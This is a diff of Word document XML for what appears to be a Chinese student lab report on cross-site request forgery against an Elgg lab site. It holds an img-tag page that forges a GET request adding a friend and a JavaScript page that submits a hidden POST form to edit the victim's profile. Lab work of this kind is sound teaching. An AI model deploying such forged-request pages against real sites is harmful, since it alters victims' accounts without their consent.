+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C223FBF" wp14:editId="6DA1E517">
+            <wp:extent cx="2608366" cy="2547606"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
+            <wp:docPr id="13" name="图片 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2613907" cy="2553018"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>具体参数如下</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F58D4EC" wp14:editId="6CB54347">
+            <wp:extent cx="5274310" cy="914400"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="12" name="图片 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5274310" cy="914400"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -1243,121 +1188,104 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId18" w:history="1">
+      <w:hyperlink r:id="rId20" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a3"/>
           </w:rPr>
-          <w:t>h</w:t>
+          <w:t>http://www.csrflabelgg.com/action/friends/add?friend=43&amp;__elgg_ts=1599724915&amp;__elgg_token=2rA_9cc7S6L8E</w:t>
         </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>进入</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/var/www/CSRF/Attacker</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>目录，创建index</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.html</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>写入html攻击代码，只需要模拟friend参数即可，剩下两个参数检测没有开启。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>使用img标签，直接将get攻击链接替换为src的链接，即可实现自动访问这个get链接。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  &lt;h1&gt;This page forges an HTTP GET request.&lt;/h1&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  &lt;img src="http://www.csrflabelgg.com/action/friends/add?friend=43"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">       alt="img" width="1" height="1"/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;body/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;/html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>使alice访问</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a3"/>
           </w:rPr>
-          <w:t>ttp://www.csrflabelgg.com/action/friends/add?friend=43&amp;__elgg_ts=1599724915&amp;__elgg_token=2rA_9cc7S6L8E</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>进入</w:t>
-      </w:r>
-      <w:r>
-        <w:t>/var/www/CSRF/Attacker</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>目录，创建index</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.html</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>写入html攻击代码，只需要模拟friend参数即可，剩下两个参数检测没有开启。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>使用img标签，直接将get攻击链接替换为src的链接，即可实现自动访问这个get链接。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;html&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;body&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  &lt;h1&gt;This page forges an HTTP GET request.&lt;/h1&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  &lt;img src="http://www.csrflabelgg.com/action/friends/add?friend=43"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">       alt="img" width="1" height="1"/&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;body/&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;/html&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>使alice访问</w:t>
-      </w:r>
-      <w:hyperlink r:id="rId19" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="a3"/>
-          </w:rPr>
-          <w:t>http://</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="a3"/>
-          </w:rPr>
-          <w:t>www.csrflabattacker.com</w:t>
+          <w:t>http://www.csrflabattacker.com</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -1406,113 +1334,6 @@
             <wp:extent cx="2880116" cy="1614127"/>
             <wp:effectExtent l="0" t="0" r="0" b="5715"/>
             <wp:docPr id="14" name="图片 14"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="2887099" cy="1618040"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>lice登录并点击</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>此链接。</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F545158" wp14:editId="1F312B5B">
-            <wp:extent cx="1172308" cy="1882589"/>
-            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
-            <wp:docPr id="15" name="图片 15"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="1181852" cy="1897915"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B710C4A" wp14:editId="5AF13EA2">
-            <wp:extent cx="2470277" cy="1339919"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="16" name="图片 16"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1532,7 +1353,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2470277" cy="1339919"/>
+                      <a:ext cx="2887099" cy="1618040"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1545,6 +1366,24 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>lice登录并点击</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>此链接。</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p>
       <w:r>
@@ -1552,10 +1391,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D8BF3D6" wp14:editId="3D163ECC">
-            <wp:extent cx="2235315" cy="1193861"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
-            <wp:docPr id="17" name="图片 17"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F545158" wp14:editId="1F312B5B">
+            <wp:extent cx="1172308" cy="1882589"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
+            <wp:docPr id="15" name="图片 15"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1575,7 +1414,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2235315" cy="1193861"/>
+                      <a:ext cx="1181852" cy="1897915"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1598,10 +1437,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DEB24F3" wp14:editId="0FA37B05">
-            <wp:extent cx="2845887" cy="480076"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="18" name="图片 18"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B710C4A" wp14:editId="5AF13EA2">
+            <wp:extent cx="2470277" cy="1339919"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="16" name="图片 16"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1621,7 +1460,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2978074" cy="502375"/>
+                      <a:ext cx="2470277" cy="1339919"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1634,24 +1473,17 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>添加friend成功</w:t>
-      </w:r>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="269647A3" wp14:editId="07A9B87B">
-            <wp:extent cx="3628261" cy="1113052"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="19" name="图片 19"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D8BF3D6" wp14:editId="3D163ECC">
+            <wp:extent cx="2235315" cy="1193861"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="17" name="图片 17"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1671,7 +1503,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3675892" cy="1127664"/>
+                      <a:ext cx="2235315" cy="1193861"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1683,51 +1515,21 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Task3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>修改</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>brief</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> des</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cription</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41A5B085" wp14:editId="0C71BFE0">
-            <wp:extent cx="1416123" cy="1892397"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DEB24F3" wp14:editId="0FA37B05">
+            <wp:extent cx="2845887" cy="480076"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="20" name="图片 20"/>
+            <wp:docPr id="18" name="图片 18"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1747,7 +1549,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="1416123" cy="1892397"/>
+                      <a:ext cx="2978074" cy="502375"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1759,24 +1561,25 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>添加friend成功</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6B7F04" wp14:editId="18F49984">
-            <wp:extent cx="1638384" cy="673135"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="269647A3" wp14:editId="07A9B87B">
+            <wp:extent cx="3628261" cy="1113052"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="23" name="图片 23"/>
+            <wp:docPr id="19" name="图片 19"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1796,7 +1599,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="1638384" cy="673135"/>
+                      <a:ext cx="3675892" cy="1127664"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1810,47 +1613,34 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>点击save提交表单</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，post方法</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:pStyle w:val="2"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>url为</w:t>
-      </w:r>
-      <w:r>
-        <w:t>http://www.csrflabelgg.com/action/profile/edit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>参数为</w:t>
+        <w:t>Task3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>修改</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>brief</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> des</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cription</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1858,12 +1648,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB72163" wp14:editId="71F4468B">
-            <wp:extent cx="5274310" cy="2155190"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="25" name="图片 25"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41A5B085" wp14:editId="0C71BFE0">
+            <wp:extent cx="1416123" cy="1892397"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="20" name="图片 20"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1883,7 +1672,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="2155190"/>
+                      <a:ext cx="1416123" cy="1892397"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1895,31 +1684,24 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>看一下js文件给我们的提示，需要下面几个字段即可</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10E4AA3C" wp14:editId="5655257A">
-            <wp:extent cx="5274310" cy="696595"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
-            <wp:docPr id="26" name="图片 26"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6B7F04" wp14:editId="18F49984">
+            <wp:extent cx="1638384" cy="673135"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="23" name="图片 23"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1939,7 +1721,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="696595"/>
+                      <a:ext cx="1638384" cy="673135"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1957,253 +1739,51 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>填入我们的参数。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>代码如下：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;!doctype html&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;html lang="en"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>&lt;body&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;h1&gt;This page forges an HTTP POST request.&lt;/h1&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;script type="text/javascript"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        function forge_post() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            var fields;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            // The following are form entries need to be filled out by attackers.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            // The entries are made hidden, so the victim won't be able to see them.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='name' value='Alice'&gt;";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='briefdescription' value='Boby is my Hero'&gt;";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='accesslevel[briefdescription]' value ='2'&gt; ";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='guid' value='42'&gt;";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            // Create a &lt;form&gt; element.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            var p = document.createElement("form");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            // Construct the form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            p.action = "http://www.csrflabelgg.com/action/profile/edit";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            p.innerHTML = fields;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            p.method = "post";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            // Append the form to the current page.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            document.body.appendChild(p);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>点击save提交表单</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，post方法</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>url为</w:t>
+      </w:r>
+      <w:r>
+        <w:t>http://www.csrflabelgg.com/action/profile/edit</w:t>
